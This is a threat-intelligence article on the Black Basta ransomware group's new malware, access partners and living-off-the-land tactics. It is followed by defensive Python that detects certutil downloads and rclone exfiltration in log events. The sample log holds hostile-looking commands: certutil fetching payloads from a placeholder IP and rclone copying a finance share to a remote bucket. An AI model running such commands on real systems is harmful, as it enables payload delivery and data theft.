Black Basta Ransomware Group Adapts with Custom Tools and Malware

July 30, 2024

The ransomware group Black Basta has demonstrated its adaptability and resilience in the face of an ever-changing landscape. Active since April 2022, the group has successfully attacked over 500 companies globally. The group employs a double-extortion strategy, stealing and encrypting data, and demanding large ransoms often in the millions. Previously, Black Basta partnered with the QBot botnet to penetrate corporate networks. However, following the disruption of the QBot botnet by law enforcement, the group had to seek new alliances.

Cybersecurity firm Mandiant, which tracks the group under the identifier UNC4393, has detected the use of new malware and tools in Black Basta's intrusions. This highlights the group's ability to evolve and remain operational. The group has been particularly active this year, compromising high-profile entities such as Veolia North America, Hyundai Motor Europe, and Keytronic. The group's sophistication is evident in its access to zero-day vulnerability exploits, including a Windows privilege elevation flaw (CVE-2024-26169) and a VMware ESXi authentication bypass flaw (CVE-2024-37085).

After the takedown of the QBot infrastructure by the FBI and DOJ in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering DarkGate malware. The group later shifted to using SilentNight, a flexible backdoor malware delivered via malvertising. This marked a significant move away from phishing as their primary method of initial access.

Mandiant has observed Black Basta's gradual transition from using publicly available tools to developing and deploying its own custom malware. In early 2024, UNC4393 was seen deploying a custom memory-only dropper named DawnCry. This dropper initiated a multi-stage infection, followed by DaveShell, which ultimately led to the PortYard tunneler. PortYard, another custom tool, establishes connections to Black Basta's command and control (C2) infrastructure and proxies traffic.

In addition to the above, Black Basta continues to use 'living off the land' binaries and readily available tools in its latest attacks, including the Windows certutil command-line utility to download SilentNight and the Rclone tool to exfiltrate data. Despite the challenges, Black Basta remains a significant global threat and a leading actor in the ransomware landscape.
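The two living-off-the-land behaviours named above, certutil used as a downloader and Rclone used to push data to a remote, both leave a recognisable process-creation trail. The following detection logic is an added example written for this page, not code from the article or from Mandiant; it runs over constructed Sysmon-style process events (pipe-delimited timestamp, host, user, image path and command line) and flags the certutil `-urlcache ... -f <URL>` download form and any `rclone copy/sync/move` whose destination is a configured remote (`name:path`). The hostnames, users, IP addresses and file paths in the sample log are invented.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields):
# timestamp | host | user | Image | CommandLine. Values are invented for this example.
SAMPLE_EVENTS = [
    r"2024-07-30T10:01:05Z|WS-17|CORP\jsmith|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\Users\Public\update.bin",
    r"2024-07-30T10:01:40Z|WS-17|CORP\jsmith|C:\Windows\System32\certutil.exe|certutil.exe -hashfile C:\temp\installer.msi SHA256",
    r"2024-07-30T11:15:22Z|FS-02|CORP\svc_backup|C:\ProgramData\rc\rclone.exe|rclone.exe copy \\FS-02\finance remote:bucket --transfers 16 -q",
    r"2024-07-30T11:16:00Z|FS-02|CORP\jsmith|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\jsmith\notes.txt",
    r"2024-07-30T11:30:10Z|WS-09|CORP\admin|C:\Windows\System32\certutil.exe|certutil -URLCache -Split -F https://203.0.113.10/a.dat a.dat",
]
SAMPLE_LOG = "\n".join(SAMPLE_EVENTS)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    host: str
    user: str
    rule: str
    command_line: str


def parse_event(line):
    """Split one pipe-delimited event into its five fields; None if malformed."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    return dict(zip(("timestamp", "host", "user", "image", "cmdline"), parts))


def is_certutil_download(image, cmdline):
    """certutil invoked as a downloader: -urlcache together with -f and a URL.
    Legitimate certificate/hash operations (e.g. -hashfile) are not flagged."""
    if PureWindowsPath(image).name.lower() != "certutil.exe":
        return False
    low = cmdline.lower()
    return "-urlcache" in low and re.search(r"\s-f\b", low) is not None and "://" in low


def is_rclone_transfer(image, cmdline):
    """rclone copy/sync/move/copyto with a destination that looks like a configured
    remote ("name:path"). Single-letter drive specs such as C:\\ are ignored so
    local-to-local copies do not alert."""
    if PureWindowsPath(image).name.lower() != "rclone.exe":
        return False
    tokens = cmdline.split()
    subcmd = next((t.lower() for t in tokens[1:] if not t.startswith("-")), "")
    if subcmd not in {"copy", "sync", "move", "copyto"}:
        return False
    return any(re.match(r"^[A-Za-z0-9_-]{2,}:", t) for t in tokens[2:])


# Rule name -> predicate over (image, command line).
RULES = (
    ("certutil_download", is_certutil_download),
    ("rclone_remote_transfer", is_rclone_transfer),
)


def detect(log_text):
    """Run every rule over every well-formed event and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for rule, check in RULES:
            if check(ev["image"], ev["cmdline"]):
                alerts.append(Alert(ev["timestamp"], ev["host"], ev["user"], rule, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.timestamp} {a.host} {a.user} [{a.rule}] {a.command_line}")
```

Both checks key on the image name rather than on a regex over the whole command line, so a renamed binary is missed; in practice a detection pipeline would pair this with original-filename or hash metadata from the event. Three of the five sample events fire: the two certutil fetches (one with mixed-case flags) and the rclone copy to `remote:bucket`, while the `-hashfile` call and the notepad launch stay quiet.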
